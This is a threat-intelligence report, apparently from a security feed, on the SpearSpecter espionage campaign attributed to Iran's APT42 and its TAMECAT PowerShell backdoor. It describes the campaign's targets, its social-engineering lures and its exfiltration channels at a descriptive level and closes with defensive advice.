Researchers uncovered a stealthy cyber espionage campaign, named SpearSpecter, attributed to Iranian intelligence-linked hackers. These attackers used tailored social engineering and custom malware to spy on high-ranking officials.

Who was behind the attack?

The campaign is linked to APT42, an Iranian threat group operating under the IRGC Intelligence Organization. The group is known for advanced surveillance operations.

What was the goal of the attack?

The main objective was long-term espionage. The attackers wanted access to sensitive documents, emails, and credentials from government and defense officials.

High-ranking officials in government and defense, as well as their family members, were targeted to increase psychological pressure and access.

How did the attack work?

Attackers built personal relationships with targets through social engineering and invited them to fake meetings. Clicking the links triggered hidden malware downloads. The malware then spied on the user, stole data, and sent it back through encrypted channels like Telegram and Discord.

Why were these targets chosen?

Because of their sensitive roles, senior officials hold valuable intelligence. The attackers sought to gather insights into defense strategies, diplomatic actions, and personal communications.

What tools did the attackers use?

They used a custom malware called TAMECAT, which runs in memory and communicates over encrypted channels. It can steal browser data, emails, screenshots, and even Outlook mailbox files.

Is this a widespread issue?

No, this campaign was highly targeted and tailored. It focused on individuals of strategic interest to Iranian intelligence services, not the general public.

What should individuals and organizations do?

High-risk individuals should be cautious of unsolicited meeting invites, especially those involving document links. Organizations should monitor network traffic for unusual activity, block access to known C2 infrastructure, and enforce strict access controls.

Threats Feed|APT42|Last Updated 19/11/2025|AuthorCertfa Radar|Publish Date14/11/2025

Inside SpearSpecter: Precision Social Engineering and TAMECAT Malware Operations

Actor Motivations: Espionage,Exfiltration
Attack Vectors: OS command injection,Backdoor,Downloader,Dropper,Fileless malware,Baiting,Pretexting,Spear Phishing
Attack Complexity: Medium
Threat Risk: High Impact/High Probability

Threat Overview

Researchers uncovered SpearSpecter, an IRGC-IO–aligned cyber-espionage campaign targeting senior defense and government officials, alongside their family members, to expand pressure on primary targets. The group uses long-term social engineering, including WhatsApp engagement and impersonation of trusted contacts, to deliver highly personalized lures. Initial access relies on crafted meeting documents, WebDAV-based delivery, and malicious LNK shortcuts that launch TAMECAT, a modular PowerShell backdoor enabling reconnaissance, credential harvesting, browser data extraction, Outlook OST theft, screenshot capture, and encrypted exfiltration. SpearSpecter employs a resilient multi-channel C2 architecture using HTTPS, Telegram, and Discord, plus Cloudflare Workers for staging, reflecting a stealthy and persistent IRGC-linked intelligence-collection effort.

Reference and Credit: Israel National Digital Agency - November 2025

SpearSpecter: Unmasking Iran’s IRGC Cyber Operations Targeting High-Profile Individuals

Detected Targets

Type	Description	Confidence
Sector	Defense	Verified
Sector	Government Agencies and Services	Verified
Region	Israel	Verified

FAQs

SpearSpecter and TAMECAT: What You Need to Know

: Researchers uncovered a stealthy cyber espionage campaign, named SpearSpecter, attributed to Iranian intelligence-linked hackers. These attackers used tailored social engineering and custom malware to spy on high-ranking officials.
: The campaign is linked to APT42, an Iranian threat group operating under the IRGC Intelligence Organization. The group is known for advanced surveillance operations.
: The main objective was long-term espionage. The attackers wanted access to sensitive documents, emails, and credentials from government and defense officials.
: High-ranking officials in government and defense, as well as their family members, were targeted to increase psychological pressure and access.
: Attackers built personal relationships with targets through social engineering and invited them to fake meetings. Clicking the links triggered hidden malware downloads. The malware then spied on the user, stole data, and sent it back through encrypted channels like Telegram and Discord.
: Because of their sensitive roles, senior officials hold valuable intelligence. The attackers sought to gather insights into defense strategies, diplomatic actions, and personal communications.
: They used a custom malware called TAMECAT, which runs in memory and communicates over encrypted channels. It can steal browser data, emails, screenshots, and even Outlook mailbox files.
: No, this campaign was highly targeted and tailored. It focused on individuals of strategic interest to Iranian intelligence services, not the general public.
: High-risk individuals should be cautious of unsolicited meeting invites, especially those involving document links. Organizations should monitor network traffic for unusual activity, block access to known C2 infrastructure, and enforce strict access controls.

About Affiliation

APT42

Associate threats